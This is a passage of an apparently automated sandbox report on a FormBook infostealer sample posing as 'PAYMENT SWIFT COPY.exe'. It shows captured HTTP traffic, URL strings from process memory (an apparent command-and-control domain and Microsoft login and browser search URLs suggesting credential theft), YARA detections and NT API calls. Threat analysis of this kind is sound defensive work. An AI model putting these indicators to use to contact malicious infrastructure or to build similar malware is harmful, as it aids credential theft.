Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Feb 2025 04:53:37 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Feb 2025 04:53:39 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Feb 2025 04:53:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 28 Nov 2024 18:47:30 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8nO9ZKzXdVwshhZogcdWQSdD%2FR5xtJQ2NWKD2ZQ67Xbz62GIbyNxa%2BFgObK4twpko6NtNE65wNUdptsqgKKQydb2fWMjk6jLxuf8KZl4G83BK9049auWmAEu4OfXmGBMQXsTSzJLmA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9143a7ada91442a6-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1584&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=803&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f db 36 10 7e cf af b8 a9 d8 b0 01 95 68 59 69 13 4b b2 80 cc 4e b0 02 5d 17 ac 2e b6 3e d2 d2 59 64 23 91 1a 79 92 ad 05 fd ef 05 25 c5 76 b0 ad 0f 43 a9 17 ea f8 dd f7 1d 0f f7 31 fd 6e fd db 6a f3 f1 fe 16 04 d5 15 dc 7f f8 f9 ed 9b 15 78 3e 63 7f 44 2b c6 d6 9b 35 fc f9 cb e6 d7 b7 10 06 33 78 4f 46 e6 c4 d8 ed 3b 0f 3c 41 d4 c4 8c ed f7 fb 60 1f 05 da 94 6c f3 3b 3b 38 96 d0 a5 4d 5b df 0e 39 41 41 85 97 5d a4 83 c8 a1 ae 94 5d fe 0b 41 b8 58 2c c6 3c cf 81 e2 8a ab 72 e9 a1 f2 e0 b8 cb 52 81 bc c8 2e 00 00 52 92 54 61 76 39 bb 84 1f ea 82 5b 91 c0 3b 4d 70 a7 5b 55 a4 6c 3c 1c 81 35 12 07 a7 e7 e3 5f ad ec 96 de 4a 2b 42 45 fe a6 6f d0 83 7c fc 5b 7a 84 07 62 4e 3f 81 5c 70 63 91 96 1f 36 77 fe b5 c7 ce 89 14 af 71 e9 15 68 73 23 1b 92 5a 9d 31 bc d7 c6 f4 2f a1 e1 25 82 d2 04 3b 57 cc 31 dd 52 5f 21 50 df e0 a4 95 5b eb 8d 67 6e 6d 75 d1 c3 e3 4e 2b f2 ad fc 1b e3 f0 b2 39 24 90 eb 4a 9b f8 c5 d5 b0 12 18 8e 77 bc 96 55 1f 73 23 79 95 80 a3 f2 79 25 4b 15 e7 a8 08 4d f2 f9 c8 29 c2 67 8c d7 b3 33 ca c5 e2 e6 ea e6 2e 81 9a Data Ascii: 2f7TQo6~hYiKN].>Yd#y%vC1njx>cD+53xOF;<A`l;;8M[9AA]]AX,<rR.RTav9[;Mp[Ul<5_J+BEo|[zbN?\pc6wqhs#Z1/%;W1R_!P[gnmuN+9$JwUs#yy%KM)g3.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Feb 2025 04:53:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 28 Nov 2024 18:47:30 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tlGaMXU1gm2Ud83wufsAGw2t61a9z%2Frn%2FZ9%2BX1yi8GIPwyFOxJTiAld5TgjoBd12PZzuA4cZUEpcIelhmaOYndfMPrIgsqiFn%2FcuEWYWx72eDHfDG3YZEmdwso0X%2FDHvYTK1QuYjXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9143a7bdcb720f7c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1677&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f db 36 10 7e cf af b8 a9 d8 b0 01 95 68 59 69 13 4b b2 80 cc 4e b0 02 5d 17 ac 2e b6 3e d2 d2 59 64 23 91 1a 79 92 ad 05 fd ef 05 25 c5 76 b0 ad 0f 43 a9 17 ea f8 dd f7 1d 0f f7 31 fd 6e fd db 6a f3 f1 fe 16 04 d5 15 dc 7f f8 f9 ed 9b 15 78 3e 63 7f 44 2b c6 d6 9b 35 fc f9 cb e6 d7 b7 10 06 33 78 4f 46 e6 c4 d8 ed 3b 0f 3c 41 d4 c4 8c ed f7 fb 60 1f 05 da 94 6c f3 3b 3b 38 96 d0 a5 4d 5b df 0e 39 41 41 85 97 5d a4 83 c8 a1 ae 94 5d fe 0b 41 b8 58 2c c6 3c cf 81 e2 8a ab 72 e9 a1 f2 e0 b8 cb 52 81 bc c8 2e 00 00 52 92 54 61 76 39 bb 84 1f ea 82 5b 91 c0 3b 4d 70 a7 5b 55 a4 6c 3c 1c 81 35 12 07 a7 e7 e3 5f ad ec 96 de 4a 2b 42 45 fe a6 6f d0 83 7c fc 5b 7a 84 07 62 4e 3f 81 5c 70 63 91 96 1f 36 77 fe b5 c7 ce 89 14 af 71 e9 15 68 73 23 1b 92 5a 9d 31 bc d7 c6 f4 2f a1 e1 25 82 d2 04 3b 57 cc 31 dd 52 5f 21 50 df e0 a4 95 5b eb 8d 67 6e 6d 75 d1 c3 e3 4e 2b f2 ad fc 1b e3 f0 b2 39 24 90 eb 4a 9b f8 c5 d5 b0 12 18 8e 77 bc 96 55 1f 73 23 79 95 80 a3 f2 79 25 4b 15 e7 a8 08 4d f2 f9 c8 29 c2 67 8c d7 b3 33 ca c5 e2 Data Ascii: 2f7TQo6~hYiKN].>Yd#y%vC1njx>cD+53xOF;<A`l;;8M[9AA]]AX,<rR.RTav9[;Mp[Ul<5_J+BEo|[zbN?\pc6wqhs#Z1/%;W1R_!P[gnmuN+9$JwUs#yy%KM)g3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Feb 2025 04:53:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 28 Nov 2024 18:47:30 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S9dXw2V6yH%2FLVoEPb3ozAQv4NZcOssixf4CuZR8EdonqZV7gvGIWUocj9HcZShYLfI9Nq6Vd7us36DS2WKd1pGLkYBFhHWxIKfOk%2BNEAy87qKosJ%2FcM%2Bwc%2Fv6GdgEWBo%2FbF7cPyllQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9143a7ce98c17c9a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2145&min_rtt=2145&rtt_var=1072&sent=3&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10905&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f db 36 10 7e cf af b8 a9 d8 b0 01 95 68 59 69 13 4b b2 80 cc 4e b0 02 5d 17 ac 2e b6 3e d2 d2 59 64 23 91 1a 79 92 ad 05 fd ef 05 25 c5 76 b0 ad 0f 43 a9 17 ea f8 dd f7 1d 0f f7 31 fd 6e fd db 6a f3 f1 fe 16 04 d5 15 dc 7f f8 f9 ed 9b 15 78 3e 63 7f 44 2b c6 d6 9b 35 fc f9 cb e6 d7 b7 10 06 33 78 4f 46 e6 c4 d8 ed 3b 0f 3c 41 d4 c4 8c ed f7 fb 60 1f 05 da 94 6c f3 3b 3b 38 96 d0 a5 4d 5b df 0e 39 41 41 85 97 5d a4 83 c8 a1 ae 94 5d fe 0b 41 b8 58 2c c6 3c cf 81 e2 8a ab 72 e9 a1 f2 e0 b8 cb 52 81 bc c8 2e 00 00 52 92 54 61 76 39 bb 84 1f ea 82 5b 91 c0 3b 4d 70 a7 5b 55 a4 6c 3c 1c 81 35 12 07 a7 e7 e3 5f ad ec 96 de 4a 2b 42 45 fe a6 6f d0 83 7c fc 5b 7a 84 07 62 4e 3f 81 5c 70 63 91 96 1f 36 77 fe b5 c7 ce 89 14 af 71 e9 15 68 73 23 1b 92 5a 9d 31 bc d7 c6 f4 2f a1 e1 25 82 d2 04 3b 57 cc 31 dd 52 5f 21 50 df e0 a4 95 5b eb 8d 67 6e 6d 75 d1 c3 e3 4e 2b f2 ad fc 1b e3 f0 b2 39 24 90 eb 4a 9b f8 c5 d5 b0 12 18 8e 77 bc 96 55 1f 73 23 79 95 80 a3 f2 79 25 4b 15 e7 a8 08 4d f2 f9 c8 29 c2 67 8c Data Ascii: 2f7TQo6~hYiKN].>Yd#y%vC1njx>cD+53xOF;<A`l;;8M[9AA]]AX,<rR.RTav9[;Mp[Ul<5_J+BEo|[zbN?\pc6wqhs#Z1/%;W1R_!P[gnmuN+9$JwUs#yy%KM)g
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Feb 2025 04:53:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 28 Nov 2024 18:47:30 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=37fH0cxESyD%2BovF65dJ0ePNao0jklYpo4XWVM%2FoiB3Qe42TOxQg8TzUyRC40UPsq0A1PbamyKi4Bl3Z4axF1J5MzCCrTtKMadFYRnoPHXhgYvAidxrFRTMRw0IeX9Z8c7AwULpVl2w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9143a7decb6f43ad-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1536&rtt_var=768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 30 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 Data Ascii: 603<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 04:55:16 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: drfYhRLxnrcfFY.exe, 00000014.00000002.4141299471.00000000045A6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ibm-p8-kvm-03-guest-02.virt.pnr.lab.eng.rdu2.redhat.com/
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1730225320.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: NCchtKNKiPqC.exe, 00000009.00000002.1808387351.0000000002B5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp, PAYMENT SWIFT COPY.exe, 00000000.00000002.1729719943.00000000013DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: drfYhRLxnrcfFY.exe, 00000014.00000002.4143260862.0000000005824000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tkloqr.info
                Source: drfYhRLxnrcfFY.exe, 00000014.00000002.4143260862.0000000005824000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tkloqr.info/t9cz/
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: NCchtKNKiPqC.exe, 00000009.00000002.1808387351.0000000002B29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: xcopy.exe, 0000000F.00000002.4142153353.000000000401C000.00000004.10000000.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4141299471.0000000003DCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: xcopy.exe, 0000000F.00000002.4139981371.000000000295D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oa0
                Source: xcopy.exe, 0000000F.00000002.4139981371.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: xcopy.exe, 0000000F.00000002.4139981371.000000000295D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: xcopy.exe, 0000000F.00000002.4139981371.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: xcopy.exe, 0000000F.00000002.4139981371.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: xcopy.exe, 0000000F.00000002.4139981371.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: xcopy.exe, 0000000F.00000003.2050309655.0000000007866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: xcopy.exe, 0000000F.00000002.4142153353.00000000039D4000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4144056627.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4141299471.0000000003784000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2164726278.000000001A3A4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000014.00000002.4143260862.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.1987208170.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4141273840.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1867935515.0000000001810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4145888813.00000000067A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1867200881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4141340650.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1984565405.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4139835446.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4141036989.00000000038E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1869778786.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: PAYMENT SWIFT COPY.exe
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0042C953 NtClose,8_2_0042C953
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912B60 NtClose,LdrInitializeThunk,8_2_01912B60
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01912DF0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01912C70
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019135C0 NtCreateMutant,LdrInitializeThunk,8_2_019135C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01914340 NtSetContextThread,8_2_01914340
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01914650 NtSuspendThread,8_2_01914650
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912B80 NtQueryInformationFile,8_2_01912B80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912BA0 NtEnumerateValueKey,8_2_01912BA0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912BF0 NtAllocateVirtualMemory,8_2_01912BF0
